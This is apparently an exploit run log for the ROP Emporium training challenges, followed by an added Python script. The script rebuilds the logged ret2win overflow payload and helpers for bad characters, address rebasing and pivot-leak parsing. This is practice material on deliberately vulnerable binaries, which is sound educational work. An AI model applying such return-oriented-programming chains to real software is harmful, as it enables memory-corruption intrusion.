exploitOutput.txt

[x] Starting local process './ret2win'
[+] Starting local process './ret2win': pid 5024
Payload in hex: 4141414141414141414141414141414141414141414141414141414141414141414141414141414170074000000000005607400000000000
Payload in ASCII: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp\x07@\x00\x00\x00\x00\x00V\x07@\x00\x00\x00\x00\x00'
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 296B
[x] Receiving all data: 329B
[+] Receiving all data: Done (329B)
[*] Process './ret2win' stopped with exit code 0 (pid 5024)
ret2win by ROP Emporium
x86_64
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './split'
[+] Starting local process './split': pid 5027
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 87B
[x] Receiving all data: 120B
[+] Receiving all data: Done (120B)
[*] Stopped process './split' (pid 5027)
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process '/usr/bin/gdbserver'
[+] Starting local process '/usr/bin/gdbserver': pid 5030
[*] running in new terminal: ['/usr/bin/gdb', '-q', './callme', '-x', '/tmp/pwnlib-gdbscript-m1vphqyz.gdb']
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 79B
[x] Receiving all data: 171B
[+] Receiving all data: Done (171B)
[*] Process '/usr/bin/gdbserver' stopped with exit code 0 (pid 5033)
b'callme by ROP Emporium\nx86_64\n\nHope you read the instructions...\n\n> Thank you!\ncallme_one() called correctly\ncallme_two() called correctly\nAi\xca\n\nChild exited with status 0\n'
[x] Starting local process './write4'
[+] Starting local process './write4': pid 5073
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 118B
[+] Receiving all data: Done (118B)
[*] Stopped process './write4' (pid 5073)
write4 by ROP Emporium
x86_64
Go ahead and give me the input already!
> Thank you!
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './badchars'
[+] Starting local process './badchars': pid 5074
dnce,vzv
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 112B
[+] Receiving all data: Done (112B)
[*] Stopped process './badchars' (pid 5074)
badchars by ROP Emporium
x86_64
badchars are: 'x', 'g', 'a', '.'
> Thank you!
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './fluff'
[+] Starting local process './fluff': pid 5075
f -> Offset:0x3c4 || Actual -> 0x4003c4
l -> Offset:0x239 || Actual -> 0x400239
a -> Offset:0x3d6 || Actual -> 0x4003d6
g -> Offset:0x3cf || Actual -> 0x4003cf
. -> Offset:0x24e || Actual -> 0x40024e
t -> Offset:0x192 || Actual -> 0x400192
x -> Offset:0x246 || Actual -> 0x400246
t -> Offset:0x192 || Actual -> 0x400192
['0x4003c4', '0x400239', '0x4003d6', '0x4003cf', '0x40024e', '0x400192', '0x400246', '0x400192']
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 148B
[+] Receiving all data: Done (148B)
[*] Stopped process './fluff' (pid 5075)
fluff by ROP Emporium
x86_64
You know changing these strings means I have to rewrite my solutions...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './pivot'
[+] Starting local process './pivot': pid 5076
pivot by ROP Emporium
x86_64
Call ret2win() from libpivot
The Old Gods kindly bestow upon you a place to pivot: 0x7f6c90dfff10
Send a ROP chain now and it will land there
>
Heap address found: 0x7f6c90dfff10
[x] Receiving all data
[x] Receiving all data: 47B
[*] Process './pivot' stopped with exit code 0 (pid 5076)
[x] Receiving all data: 173B
[+] Receiving all data: Done (173B)
Thank you!
Now please send your stack smash
> Thank you!
foothold_function(): Check out my .got.plt entry to gain a foothold into libpivot
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './ret2csu'
[+] Starting local process './ret2csu': pid 5077
[x] Receiving all data
[x] Receiving all data: 0B
[*] Process './ret2csu' stopped with exit code 0 (pid 5077)
[x] Receiving all data: 184B
[+] Receiving all data: Done (184B)
ret2csu by ROP Emporium
x86_64
Check out https://ropemporium.com/challenge/ret2csu.html for information on how to solve this challenge.
> Thank you!
ROPE{a_placeholder_32byte_flag!}
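The log above is the raw pwntools output; the scripts that produced it are not on this page. The following is an added example (not code from the repository) that reconstructs the only payload the log shows in full, the ret2win chain on the "Payload in hex" line, and reuses the other values the log exposes: the bad-character list from the badchars banner, the offset/actual pairs from the fluff run (which imply a 0x400000 load base), and the "place to pivot" address from the pivot banner. It assumes the 40-byte padding implied by "56 bytes of user input into 32 bytes of stack buffer" minus two 8-byte addresses, and it treats 0x400770 as a lone `ret` gadget used for stack alignment; the page does not say what that address is, so that reading is an assumption. Only the standard library is used, so it runs without pwntools.

```python
import re
import struct

# Values transcribed from the exploit output on this page.
PADDING_LEN = 40                      # 56-byte payload minus two 8-byte addresses
RET_GADGET = 0x400770                 # assumed: a lone `ret` to realign rsp before ret2win
RET2WIN = 0x400756                    # second address in the logged chain
RET2WIN_PAYLOAD_HEX = (
    "41" * 40 + "7007400000000000" + "5607400000000000"   # the "Payload in hex" line
)
BADCHARS = b"xga."                    # badchars banner: 'x', 'g', 'a', '.'
FLUFF_BASE = 0x400000                 # fluff: "Offset:0x3c4 || Actual -> 0x4003c4"
FLUFF_OFFSETS = [0x3c4, 0x239, 0x3d6, 0x3cf, 0x24e, 0x192, 0x246, 0x192]
PIVOT_BANNER = "The Old Gods kindly bestow upon you a place to pivot: 0x7f6c90dfff10"


def p64(value):
    """Pack a 64-bit little-endian word, the same shape as pwntools' p64."""
    return struct.pack("<Q", value)


def u64(data):
    """Inverse of p64."""
    return struct.unpack("<Q", data)[0]


def build_chain(gadgets, padding_len=PADDING_LEN, filler=b"A"):
    """Padding up to the saved return address, then each gadget as an 8-byte word."""
    return filler * padding_len + b"".join(p64(g) for g in gadgets)


def decode_chain(payload, padding_len=PADDING_LEN):
    """Split a captured payload back into the addresses that follow the padding."""
    body = payload[padding_len:]
    if len(body) % 8:
        raise ValueError("chain is not a whole number of 8-byte words")
    return [u64(body[i:i + 8]) for i in range(0, len(body), 8)]


def find_badchars(payload, badchars=BADCHARS):
    """Return (index, byte) for every byte the target filters; empty means the chain is clean."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


def rebase(offsets, base=FLUFF_BASE):
    """Turn file/section offsets into runtime addresses for a non-PIE binary at `base`."""
    return [base + off for off in offsets]


def parse_pivot_address(banner):
    """Pull the leaked pivot address out of the banner line the pivot binary prints."""
    m = re.search(r"place to pivot: (0x[0-9a-fA-F]+)", banner)
    if not m:
        raise ValueError("no pivot address in banner")
    return int(m.group(1), 16)


def main():
    payload = build_chain([RET_GADGET, RET2WIN])
    print("payload hex matches log:", payload.hex() == RET2WIN_PAYLOAD_HEX)
    print("decoded chain:", [hex(a) for a in decode_chain(payload)])
    print("bad bytes in ret2win chain:", find_badchars(payload))
    print("bad bytes in b'flag.txt':", find_badchars(b"flag.txt"))
    print("fluff runtime addrs:", [hex(a) for a in rebase(FLUFF_OFFSETS)])
    print("pivot addr:", hex(parse_pivot_address(PIVOT_BANNER)))


if __name__ == "__main__":
    main()
```

`find_badchars(b"flag.txt")` shows why the badchars run had to write the filename through an encoding step: four of its eight bytes are on the filter list, while the plain ret2win chain contains none of them.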